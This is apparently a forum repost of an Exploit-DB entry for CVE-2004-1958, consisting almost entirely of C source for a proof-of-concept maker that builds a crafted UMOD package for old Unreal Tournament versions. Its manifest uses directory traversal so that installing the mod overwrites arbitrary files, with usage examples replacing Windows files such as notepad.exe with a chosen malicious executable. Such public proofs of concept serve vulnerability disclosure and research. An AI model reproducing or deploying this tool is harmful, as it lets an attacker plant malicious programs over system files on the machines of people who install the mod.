Exploit Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24041
Проверка EDB
  1. Пройдено
Автор
LUIGI AURIEMMA
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2004-1958
Дата публикации
2004-04-22
C:
// source: https://www.securityfocus.com/bid/10196/info

Reportedly the Unreal Tournament Engine is affected by a local file overwrite vulnerability due to the UMOD manifest.ini file. This issue is due to an input validation error that allows a malicious user specify arbitrary files for writing, potentially leading to a system wide denial of service condition.

/*

by Luigi Auriemma

UNIX & WIN VERSION


UMOD CRC calculation 0.2
by Luigi Auriemma
e-mail: [email protected]

web:    http://aluigi.altervista.org


This function must be used to calculate the CRC checksum used in the
umod files.

For more informations about the umod file format read my document
and my relative 
tools on my website in the section dedicated to the
Unreal engine.


How to use, 
the 2 possible methods:printf("CRC: 0x%08lx\n", umodcrc("test.umod", 0));
2) 
fd = fopen("test.umod", "rb");printf("CRC: 0x%08lx\n", umodcrc(NULL, fd);



Return value:
The value is the CRC of the file or 0xffffffff (-1) 
if there are
errors


Practically if you pass NULL as filename, 
the function will use the FILE
descriptor passed as second argument 
otherwise the function will open the
file using the first parameter (filename)


This source is covered by GNU/GPL



*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "umodcrc.h"


#ifndef u_long
    #define u_long  unsigned long

#endif

#ifndef u_char

    #define u_char  unsigned char

#endif







#define UT2BUFFSZ   0x4000





    /* complete CRC calculation */



u_long umodcrc(
    
	u_char *filename,   /* name of the file for CRC calculation */
    
	FILE *fdopen        /* FILE descriptor */

);



    
/* CRC algorithm */


u_long appmemcrc(

	u_char *data,       /* buffer containing the data from the file */
    
	u_long size,        /* size of the data */

	u_long oldcrc       /* previous CRC, it must start from 0 */

);







u_long  gcrctable[] = {
 0x00000000, 0x04c11db7, 0x09823b6e, 0x0d4326d9,
 0x130476dc, 0x17c56b6b, 0x1a864db2, 0x1e475005,
 0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61,
 0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd,
 0x4c11db70, 0x48d0c6c7, 0x4593e01e, 0x4152fda9,
 0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75,
 0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011,
 0x791d4014, 0x7ddc5da3, 0x709f7b7a, 0x745e66cd,
 0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039,
 0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5,
 0xbe2b5b58, 0xbaea46ef, 0xb7a96036, 0xb3687d81,
 0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d,
 0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49,
 0xc7361b4c, 0xc3f706fb, 0xceb42022, 0xca753d95,
 0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1,
 0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d,
 0x34867077, 0x30476dc0, 0x3d044b19, 0x39c556ae,
 0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072,
 0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16,
 0x018aeb13, 0x054bf6a4, 0x0808d07d, 0x0cc9cdca,
 0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde,
 0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02,
 0x5e9f46bf, 0x5a5e5b08, 0x571d7dd1, 0x53dc6066,
 0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba,
 0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e,
 0xbfa1b04b, 0xbb60adfc, 0xb6238b25, 0xb2e29692,
 0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6,
 0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a,
 0xe0b41de7, 0xe4750050, 0xe9362689, 0xedf73b3e,
 0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2,
 0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686,
 0xd5b88683, 0xd1799b34, 0xdc3abded, 0xd8fba05a,
 0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637,
 0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb,
 0x4f040d56, 0x4bc510e1, 0x46863638, 0x42472b8f,
 0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53,
 0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47,
 0x36194d42, 0x32d850f5, 0x3f9b762c, 0x3b5a6b9b,
 0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff,
 0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623,
 0xf12f560e, 0xf5ee4bb9, 0xf8ad6d60, 0xfc6c70d7,
 0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b,
 0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f,
 0xc423cd6a, 0xc0e2d0dd, 0xcda1f604, 0xc960ebb3,
 0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7,
 0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b,
 0x9b3660c6, 0x9ff77d71, 0x92b45ba8, 0x9675461f,
 0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3,
 0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640,
 0x4e8ee645, 0x4a4ffbf2, 0x470cdd2b, 0x43cdc09c,
 0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8,
 0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24,
 0x119b4be9, 0x155a565e, 0x18197087, 0x1cd86d30,
 0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec,
 0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088,
 0x2497d08d, 0x2056cd3a, 0x2d15ebe3, 0x29d4f654,
 0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0,
 0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c,
 0xe3a1cbc1, 0xe760d676, 0xea23f0af, 0xeee2ed18,
 0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4,
 0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0,
 0x9abc8bd5, 0x9e7d9662, 0x933eb0bb, 0x97ffad0c,
 0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668,
 0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4 };








u_long umodcrc(u_char *filename, FILE *fdopen) {
	FILE            *fd;
	int             err,
 len;
	u_char          *buff;
	u_long          crc = 0x00000000,
oldoff = 0;
	struct stat	xstat;


    
	
	if(filename) {
        
		fd = fopen(filename, "rb");

		if(!fd) return(-1);
    
	} else {

		fd = fdopen;
		oldoff = ftell(fd);     // methodic and ordinate 8-)
	}

    

	err = fstat(fileno(fd), &xstat);


	if(err < 0) return(-1);
	if(xstat.st_size >= 20) xstat.st_size -= 20;

	else return(-1);



	buff = malloc(UT2BUFFSZ);
	if(!buff) return(-1);
	len = UT2BUFFSZ;


	do {

		if(len > xstat.st_size) len = xstat.st_size;
		err = fread(buff, len, 1, fd);
		if(err != 1) break;
		crc = appmemcrc(buff, len, crc);
		xstat.st_size -= len;

	} while(xstat.st_size);

	if(filename) fclose(fd);

	else fseek(fd, oldoff, SEEK_SET);



	free(buff);

	return(crc);


}










u_long appmemcrc(u_char *data, u_long size, u_long oldcrc)
{

    oldcrc = ~oldcrc;

    for(; size > 0; size--, data++) {

        oldcrc = (oldcrc << 8) ^ gcrctable[*data ^ (oldcrc >> 24)];

    }

    return(~oldcrc);

}




/********************************************************************/


#ifdef WIN32
    #include <direct.h>
    #include <malloc.h>

    #define u_long  unsigned long
    #define u_char  unsigned char
#else
    #include <unistd.h>
    #include <sys/stat.h>
#endif




#define VER         "0.1"
#define BUFFSZ      16384
#define UMODSIGN    0x9fe3c5a3
#define MANIFEST    \
    "[Setup]\n" \
    "Product=Arbitrary file ovewriting by Luigi Auriemma\n" \
    "Version=1\n" \
    "Archive=%s\n" \
    "SrcPath=.\n" \
    "MasterPath=..\n" \
    "StartProduct=UMODPoC\n" \
    "\n" \
    "Group=SetupGroup\n" \
    "\n" \
    "[SetupGroup]\n" \
    "Copy=(Src="MANINI",Master="MANINI",Flags=3)\n" \
    "File=(Src=%s)\n"
#define MANINI      "System\\Manifest.ini"




void std_err(void);
void io_err(void);




int main(int argc, char *argv[]) {
    FILE    *fdin,
            *fdmod;
    u_char  *buff;
    u_long  offset,
            manifestsz;
    int     err;
    struct  stat    xstat;
    struct end {
        u_long  sign;
        u_long  indexstart;
        u_long  indexend;
        u_long  one;
        u_long  crc;
    } end;


    setbuf(stdout, NULL);

    fputs("\n"
        "UMOD arbitrary file overwriting proof-of-concept maker "VER"\n"
        "  Vulnerable games:\n"
        "  - Unreal Tournament      <= 451b\n"
        "  - Unreal Tournament 2003 <= 2225\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <malicious_file> <\"fake_file_name\"> <file.umod/ut2mod>\n"
            "\n"
            "You must use a filename with directory traversal exploitation\n"
            "For example:\n"
            "..\\..\\..\\autoexec.bat\n"
            "..\\..\\..\\windows\\system.ini\n"
            "\n"
            "Simple usage example:\n"
            "\n"
            "%s malicious.exe \"..\\..\\..\\windows\\notepad.exe\" useme.umod\n"
            "\n", argv[0], argv[0]);
        exit(1);
    }

    printf("Opening %s\n", argv[1]);
    fdin = fopen(argv[1], "rb");
    if(!fdin) std_err();
    err = fstat(fileno(fdin), &xstat);
    if(err < 0) std_err();
    printf("Size: %lu\n\n", xstat.st_size);

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    manifestsz = snprintf(
        buff,
        BUFFSZ,
        MANIFEST,
        argv[3],
        argv[2]);

    printf("Build virtual "MANINI"\n"
            "Size: %lu\n"
            "\n", manifestsz);

    printf("Creating %s\n\n", argv[3]);
    fdmod = fopen(argv[3], "wb");
    if(!fdmod) std_err();

    if(fwrite(buff, manifestsz, 1, fdmod) != 1) io_err();
    err = manifestsz;
    while(err & 0xf) {      /* useless but all the UMODs does the same */
        fputc(0x00, fdmod);
        err++;
    }

    offset = ftell(fdmod);                          // malicious file offset

    while(1) {
        err = fread(buff, 1, BUFFSZ, fdin);
        if(!err) break;
        if(fwrite(buff, err, 1, fdmod) != 1) io_err();
    }
    fclose(fdin);
    err = ftell(fdmod);
    while(err & 0xf) {      /* useless but all the UMODs does the same */
        fputc(0x00, fdmod);
        err++;
    }

    end.indexstart = err;                           // starting of index

    fputc(2, fdmod);                                // number of files

    fputc(sizeof(MANINI) - 1, fdmod);               // filename size
    fwrite(MANINI, sizeof(MANINI) - 1, 1, fdmod);   // filename
    fwrite("\x00\x00\x00\x00", 4, 1, fdmod);        // starting offset
    fwrite((void *)&manifestsz, 4, 1, fdmod);       // size of the file
    fwrite("\x03\x00\x00\x00", 4, 1, fdmod);        // flag

    err = strlen(argv[2]) + 1;
    fputc(err, fdmod);
    fwrite(argv[2], err, 1, fdmod);
    fwrite((void *)&offset, 4, 1, fdmod);
    fwrite((void *)&xstat.st_size, 4, 1, fdmod);
    fwrite("\x00\x00\x00\x00", 4, 1, fdmod);

    end.sign     = UMODSIGN;                        // umod sign
    end.indexend = ftell(fdmod) + sizeof(end);      // index ending
    end.one      = 1;                               // 1
    end.crc      = 0x00000000;                      // crc (calculated later)

    fwrite((void *)&end, sizeof(end), 1, fdmod);

        /* crc checking */
    fflush(fdmod);
    end.crc = umodcrc(argv[3], 0);
    fseek(fdmod, -4, SEEK_CUR);
    fwrite((void *)&end.crc, 4, 1, fdmod);

    fclose(fdmod);

    printf("\n"
        "Informations about %s:\n"
        "-------------------\n"
        "Index section offset: 0x%08lx\n"
        "Total package size:   %lu\n"
        "CRC:                  %08lx\n"
        "\n"
        "Files contained:\n"
        MANINI"   (used for installation)\n"
        "%s\n"
        "\n"
        "Proof-of-concept successfully created!\n",
        argv[3],
        end.indexstart,
        end.indexend,
        end.crc,
        argv[2]);

    return(0);
}




void std_err(void) {
    perror("\nError");
    exit(1);
}




void io_err(void) {
    fputs("\nError: I/O error, the file is incomplete or the disk space is finished\n", stdout);
    exit(1);
}
 
Источник
www.exploit-db.com

Похожие темы